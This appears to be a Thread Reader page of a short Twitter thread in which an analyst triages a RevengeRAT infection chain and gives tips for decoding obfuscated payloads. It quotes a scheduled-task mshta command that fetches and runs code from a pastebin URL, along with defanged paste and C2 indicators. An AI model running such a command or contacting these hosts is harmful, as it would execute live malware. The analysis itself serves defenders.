Discover and read the best of Twitter Threads about #RevengeRAT

Most recents (1)

Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching:

mshta http:\\pastebin[.]com\raw\JF0Zjp3g
⚠️ note: simple backslash URL trick
💆 know: "4D 5A" (MZ)

🔚 Result:
#RevengeRAT on https://paste[.]ee/r/OaKTX
C2: cugugugu.duckdns[.]org Image
You should process these at scale and - outside of training - it's not a good use of time to step through them manually.

👨‍💻btw if you like network infrastructure triage, that DuckDNS C2 resolves to an IP address with :3389 open, serving up an SSL certificate exposing a hostname.
The other point here is that you should listen to @cyb3rops' tips on common patterns:
If you see:
*^*4D, *^*5A, *^*90, *^*00, ...

You can save time & breeze through any VBscript & PowerShell decoding from the original paste. You can strip it with a sloppy regex & decode the EXE. Image
Read 4 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!